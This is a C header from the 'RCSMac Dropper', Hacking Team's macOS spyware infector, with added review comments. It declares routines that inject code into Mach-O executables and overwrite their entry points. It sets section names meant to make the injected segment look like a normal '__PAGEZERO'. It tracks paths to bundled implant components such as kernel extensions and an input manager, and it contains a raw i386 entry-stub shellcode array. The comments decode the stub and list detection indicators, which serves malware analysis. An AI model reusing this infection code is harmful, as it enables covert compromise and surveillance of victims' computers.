/*
 * RCSMac Dropper
 *
 *
 * Created by Alfredo 'revenge' Pesoli on 20/07/2009
 * Win32 porting by Massimo Chiodini on 02/11/2009 
 * Copyright (C) HT srl 2009. All rights reserved
 *
 */
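/*
 * Include guard on every platform, not only WIN32. This header *defines*
 * objects (crtStart below carries an initializer), so a second inclusion
 * in the same translation unit is a hard redefinition error on the macOS
 * build, where the original guard was compiled out. #pragma once is
 * honoured by clang/gcc as well as MSVC, so it can sit outside the #ifdef.
 */
#pragma once

#ifdef WIN32
#include <Windows.h>
#endif

/* Project header (not visible here). Presumably provides _mChar and the
 * Mach-O types used below (struct fat_header) — confirm. */
#include "RCSMacInfectorUtil.h"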

/*
 * Names stamped on the injected code when it is written into the target
 * Mach-O. INJECTED_SEGMENT_NAME reuses "__PAGEZERO", the name Mach-O
 * executables already use for their zero-page segment, rather than a new
 * segment name — presumably to keep the added load command inconspicuous;
 * how the .c side actually emits them is not visible here. From a detection
 * standpoint these two literals (plus the crtStart bytes further down) are
 * the obvious static indicators of a file processed by this tool.
 */
#define INJECTED_SECTION_NAME "__init_stub"
#define INJECTED_SEGMENT_NAME "__PAGEZERO"

/* Page size used for aligning injected data (4 KiB), and the Mach-O
 * filetype value of a plain executable (MH_EXECUTE == 2, same value as in
 * Apple's <mach-o/loader.h>) — presumably redefined here so the Win32 port
 * builds without Apple's headers. */
#define PAGE_ALIGNMENT  0x1000
#define MH_EXECUTE      0x2


/* Number of resources (presumably the embedded files tracked by the
 * *FilePath / g*FileSize globals below); set elsewhere. NOTE(review): this
 * is a definition in a header, not an `extern` declaration — it only works
 * while exactly one .c file includes this header; with a second includer
 * the symbol is duplicated, and whether that links depends on the
 * toolchain's treatment of common symbols. */
int gNumberOfResources;

//
// Type of strings
//
/* Tags for the strings the infector tracks (gNumStrings below holds the
 * count): a symbol name versus raw data. What each tag changes is decided
 * in the .c side. */
#define STRING_SYMBOL   0x0001
#define STRING_DATA     0x0002

/* Mach-O cpu_type values (same numbers as Apple's <mach/machine.h>):
 * x86 is 7 and x86_64 is x86 OR'ed with the 64-bit ABI flag bit.
 * Presumably present so the Win32 build can tell the 32-/64-bit slices
 * apart without Apple's headers. */
#define CPU_ARCH_ABI64  0x01000000    /* 64 bit ABI */
#define CPU_TYPE_X86    0x7
#define CPU_TYPE_X86_64 (CPU_TYPE_X86 | CPU_ARCH_ABI64)

/*
 * Entry stub that runs ahead of the infected binary's original code.
 * Raw i386 (32-bit) machine code; decoded byte for byte:
 *
 *   6a 00          push   0              ; zero word ends the frame chain,
 *   89 e5          mov    ebp, esp       ;   so argc sits at [ebp+4] if the
 *                                        ;   stub runs at process entry
 *   83 e4 f0       and    esp, -16       ; 16-byte stack alignment
 *   83 ec 10       sub    esp, 0x10      ; room for four outgoing args
 *   8b 5d 04       mov    ebx, [ebp+4]   ; argc
 *   89 5c 24 00    mov    [esp], ebx
 *   8d 4d 08       lea    ecx, [ebp+8]   ; argv
 *   89 4c 24 04    mov    [esp+4], ecx
 *   83 c3 01       add    ebx, 1
 *   c1 e3 02       shl    ebx, 2
 *   01 cb          add    ebx, ecx       ; envp = argv + (argc+1)*4
 *   89 5c 24 08    mov    [esp+8], ebx
 * loop:
 *   8b 03          mov    eax, [ebx]     ; walk envp ...
 *   83 c3 04       add    ebx, 4
 *   85 c0          test   eax, eax
 *   75 f7          jnz    loop           ; ... until its NULL terminator
 *   89 5c 24 0c    mov    [esp+0xc], ebx ; pointer just past envp ("apple")
 *   60             pushad                ; save all general registers
 *   e8             call   rel32          ; OPCODE ONLY: the 4-byte
 *                                        ;   displacement must be appended
 *                                        ;   by whatever emits the stub
 *
 * NOTE(review):
 *  - This is the argc/argv/envp/apple setup of an i386 crt start routine
 *    and is 32-bit only (ebp/esp, 4-byte pointer stride, pushad is invalid
 *    in 64-bit mode). No x86_64 stub is declared in this header, although
 *    infectSingleArch64() is.
 *  - It is a string literal: the 51 code bytes get an implicit trailing NUL,
 *    so sizeof crtStart is 52. A copy must use sizeof(crtStart) - 1 or a
 *    stray 0x00 lands in the target. It also contains an embedded 0x00 at
 *    offset 1, so strlen() must never be used for its length.
 *  - The commented-out line is an earlier tail without the pushad.
 */
unsigned char crtStart[] = "\x6a\x00\x89\xe5\x83\xe4\xf0\x83\xec"
                           "\x10\x8b\x5d\x04\x89\x5c\x24\x00\x8d"
                           "\x4d\x08\x89\x4c\x24\x04\x83\xc3\x01"
                           "\xc1\xe3\x02\x01\xcb\x89\x5c\x24\x08"
                           "\x8b\x03\x83\xc3\x04\x85\xc0\x75\xf7"
                           //"\x89\x5c\x24\x0c\xe8";
                           "\x89\x5c\x24\x0c\x60\xe8";

/*
 * Paths of the pieces the dropper bundles and of the binary being worked
 * on. The names are the only hint to their meaning; the first eight pair
 * one-to-one with the g*FileSize counters below, while installPath and
 * outputFilePath have no size counter (the output size is passed to
 * infectBinary() as a parameter instead). Ownership is not stated anywhere
 * visible: presumably they point into argv[] (see parseArguments()) or at
 * heap copies — check before freeing any of them. As with the other
 * globals here, these are definitions in a header, so only one .c file
 * may include it.
 */
char *coreFilePath;
char *confFilePath;
char *kext32FilePath;
char *kext64FilePath;
char *inputManagerFilePath;
char *XPCFilePath;
char *iconFilePath;
char *bitmapFilePath;
char *installPath;         /* install location on the target, presumably */
char *inputFilePath;       /* host binary to infect */
char *outputFilePath;      /* infected result */

/*
 * Byte sizes of the files named by the *FilePath pointers above, one
 * counter per embedded resource plus the input file. They are plain `int`,
 * as are every offset and size in the prototypes below, so anything at or
 * above 2 GiB wraps negative before any bounds check can see it — a
 * header-wide limit, not a local one.
 */
int gCoreFileSize;
int gConfFileSize;
int gKext32FileSize;
int gKext64FileSize;
int gInputManagerFileSize;
int gXPCFileSize;
int gIconFileSize;
int gInputFileSize;
int gBitmapFileSize;

/* Layout of the host binary, presumably as classified by getBinaryFormat():
 * 0 = single-architecture Mach-O, 1 = FAT (universal) binary, 2 = FAT
 * "swap" — presumably a fat header in the opposite byte order from the
 * host (fat headers are big-endian on disk); confirm in the .c side. */
int gFileType; // 0 = SingleArch, 1 = FAT, 2 = FAT (swap)

/* Number of strings tagged STRING_SYMBOL / STRING_DATA (defined above). */
int gNumStrings;

/* Copy of the host's fat header. struct fat_header is not declared in this
 * file, so it must come through RCSMacInfectorUtil.h. */
struct fat_header gFatHeader;

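/*
 * Read the entry point of a mapped 32-bit Mach-O image.
 *   machoBase  address of the Mach-O header in memory
 * Returns the entry point as a 32-bit value. No 64-bit accessor is declared
 * in this header even though a 64-bit infection routine is.
 */
uint32_t
getBinaryEP_32 (void *machoBase);

/*
 * Overwrite the entry point of a mapped 32-bit Mach-O image.
 *   machoBase      address of the Mach-O header in memory
 *   anEntryPoint   new entry point value
 * Returns an int status; the convention (0 on success?) is not visible
 * here — check the definition before relying on it.
 */
int
setBinaryEP_32 (void *machoBase, uint32_t anEntryPoint);

/*
 * Infect one architecture slice (32-bit / x86_64 variants, same contract).
 *   inputFilePointer / outputFilePointer  mapped source and destination
 *   inOffsetToArch / outOffsetToArch      byte offset of the slice in each
 *   inputFileSize / outputFileSize        size of each mapping
 * Offsets and sizes are `int`: callers must keep every value below
 * INT_MAX, and any bounds check inside must treat negatives as invalid.
 * Returns an int status (convention not visible here).
 */
int
infectSingleArch (char *inputFilePointer,
                  char *outputFilePointer,
                  int inOffsetToArch,
                  int outOffsetToArch,
                  int inputFileSize,
                  int outputFileSize);

int
infectSingleArch64 (char *inputFilePointer,
                    char *outputFilePointer,
                    int inOffsetToArch,
                    int outOffsetToArch,
                    int inputFileSize,
                    int outputFileSize);

/*
 * Top-level driver: infect a whole (single-arch or FAT) file.
 *   aBinaryType       layout as in gFileType (0 single, 1 FAT, 2 FAT swap)
 *   fileSize          size of the input mapping
 *   inputFilePointer  mapped input file
 *   outputFilePointer mapped output file of outputFileSize bytes
 *   segmentVMAddr     out-parameter; presumably receives the VM address of
 *                     the injected segment — confirm in the definition
 * Returns an int status (convention not visible here).
 */
int
infectBinary (int aBinaryType,
              int fileSize,
              char *inputFilePointer,
              char *outputFilePointer,
              int outputFileSize,
              unsigned int *segmentVMAddr);

/*
 * Classify a mapped file; presumably returns one of the gFileType values
 * (confirm in the definition).
 *   aFilePointer  start of the mapped file
 */
int
getBinaryFormat (char *aFilePointer);

/*
 * Print command-line help.
 *   aBinaryName  program name; _mChar comes from RCSMacInfectorUtil.h
 *                (presumably char vs. wide char per platform). Note that
 *                parseArguments() below still takes plain char ** argv.
 */
void
usage (_mChar *aBinaryName);

/*
 * Fill the *FilePath / g*FileSize globals from the command line.
 *   argc, argv  as received by main()
 * Returns an int status (convention not visible here).
 */
int
parseArguments (int argc, char **argv);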